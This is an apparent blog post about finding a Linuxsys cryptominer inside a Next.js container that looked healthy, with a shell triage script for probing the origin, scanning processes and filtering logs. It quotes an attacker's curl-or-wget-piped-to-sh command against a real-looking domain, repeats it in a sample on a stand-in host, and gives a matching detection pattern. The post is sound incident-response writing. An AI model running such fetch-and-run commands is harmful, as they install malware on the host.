Ocheverse · April 27, 2026 · 2 min read

The System Was Up. The System Was Compromised.

By Ocheverse

The site was technically online.

The container was running.

Health checks did not scream.

next start said ready.

And still, the system was failing.

Not loudly.

Quietly.

Requests hung. Even /favicon.ico stalled. Cloudflare returned a 524, which means the edge reached the origin and the origin accepted the TCP connection but never finished an HTTP response in time. At first, it looked like one more infrastructure ghost story: maybe reverse proxy trouble, maybe Next.js behaving strangely, maybe a bad dependency.

It was none of those. Or at least not in the way I thought.

The first real clue was simple:

curl localhost:5600

Connection accepted.

Zero bytes returned.

That changed the question.

This was no longer why is the site down?

It became:

What is the application doing instead of serving requests?

That led to process inspection.

And that was where the illusion broke.

Inside the container sat a process I never deployed:

linuxsys

Burning CPU.

Starving the app.

Keeping the process “alive” while making the service unusable.

A healthy container.

An unhealthy system.

Then the logs showed something worse.

Repeated attempts to execute:

(curl ... repositorylinux.dpdns.org/linux.sh || wget ...) | sh

A remote script being piped into a shell from inside the runtime.
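The three observations above (a connection that is accepted but returns no bytes, a process that should not be there burning CPU, and a remote script piped into a shell) each have a cheap check. Below is an added example, not code from the original post: a small POSIX shell triage script that encodes those checks as functions and runs the last two against constructed samples so it can be tried offline. Port 5600 is taken from the post; the command names in the allowlist, the domain example.invalid, and the ps and log lines are constructed for the demo and are not a capture from the incident.

```sh
#!/bin/sh
# Added example (not from the original post). Triage helpers for the
# "container is up, service hangs" pattern: an origin probe that separates
# "refused" from "accepted but never answered", a process scan against an
# allowlist with a CPU threshold, and a log filter for remote-script-to-shell
# pipes. Everything under "Constructed samples" is made up for the demo.

# 1. Origin probe. A dashboard cannot tell a refused connection from one that
#    is accepted and then hangs; curl can: exit 7 = could not connect,
#    exit 28 = connected but timed out, with bytes=0 (the /favicon.ico symptom).
#    Not invoked below because it needs a live origin.
probe_origin() {
    url="$1"
    deadline="${2:-5}"
    curl -sS -o /dev/null --max-time "$deadline" \
         -w 'http=%{http_code} bytes=%{size_download}\n' "$url"
    # e.g. probe_origin http://localhost:5600/favicon.ico 5
}

# 2. Process scan over `ps -eo pid,pcpu,comm` output read from stdin.
#    $1 = space-separated allowlist of command names expected in the container
#    $2 = CPU percent above which even an expected command is reported
#    Prints "PID %CPU COMMAND (reason)" for anything off-list or hot.
flag_suspect_procs() {
    awk -v allow="$1" -v thresh="${2:-80}" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        NR == 1 { next }                       # skip the ps header line
        {
            reason = ""
            if (!($3 in ok))         reason = "unexpected"
            if ($2 + 0 > thresh + 0) reason = reason (reason != "" ? "," : "") "cpu>" thresh
            if (reason != "") printf "%s %s %s (%s)\n", $1, $2, $3, reason
        }'
}

# 3. Log filter: a curl/wget whose output is piped straight into sh/bash/dash.
#    "| sha256sum" does not match because "sh" must be followed by space or EOL.
flag_pipe_to_shell() {
    grep -E '(curl|wget).*[|][[:space:]]*(ba|da)?sh([[:space:]]|$)'
}

# --- Constructed samples (not captured from the incident) ---
PS_SNAPSHOT='  PID %CPU COMMAND
    1  0.1 node
   17  0.3 next-server
   42 98.7 linuxsys
   58  0.0 sh'

LOG_SAMPLE='2026-04-27T03:12:01Z app: GET /favicon.ico (no response sent)
2026-04-27T03:12:05Z sh: (curl -fsSL http://example.invalid/linux.sh || wget -qO- http://example.invalid/linux.sh) | sh
2026-04-27T03:12:09Z build: curl -fsSL http://example.invalid/SHA256SUMS | sha256sum -c'

# Wrappers so the samples can be checked without a live container.
scan_sample_procs() { printf '%s\n' "$PS_SNAPSHOT" | flag_suspect_procs "node next-server" 80; }
scan_sample_logs()  { printf '%s\n' "$LOG_SAMPLE"  | flag_pipe_to_shell; }

echo "== suspect processes =="
scan_sample_procs
echo "== remote script piped to shell =="
scan_sample_logs
```

Against the samples, the process scan reports linuxsys as both off-list and above the CPU threshold and reports the stray sh as off-list, while the log filter returns only the curl-or-wget-into-sh line and ignores the benign checksum pipe. The probe, with a short --max-time, is also what a container health check should run: "next start said ready" and a listening port prove the process exists, a bounded request for a real route proves it still serves.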

That was the moment this stopped being debugging.

It became incident response.

Later research suggested the pattern matched the Linuxsys cryptominer campaign. That explained the rogue process, the resource starvation, even the deceptive “everything looks fine” surface symptoms.

The 524 was not the incident.

It was the clue.

What made this unsettling was how ordinary everything looked.

Docker said up.

Ports were listening.

Node was running.

And the system was compromised.

That is a lesson in itself.

We often confuse process health with system health.

They are not the same.

Sometimes a service is down because it crashed.

Sometimes it is down because something else is using its oxygen.

This was the second kind.

The fix was a clean rebuild from a trusted base and a dependency refresh, not blind restarts. A restart would only have handed the miner a fresh process to ride. A rebuild removes the payload; it does not by itself close whatever let it in, so the entry point still has to be found and shut.

And a reminder:

Build artifacts deserve the same suspicion we reserve for infrastructure.

Trust is part of the attack surface.

Things I’m keeping from this

  • A healthy container can lie.

  • Timeouts can be CPU starvation wearing a networking mask.

  • Supply chain thinking is not optional anymore.

  • “The system is up” is not the same as “the system is safe.”

And maybe the biggest one:

The most dangerous failures often do not announce themselves.

They impersonate normal.

Until you ask the right question.

Why is even /favicon.ico hanging?

That question found the whole story.
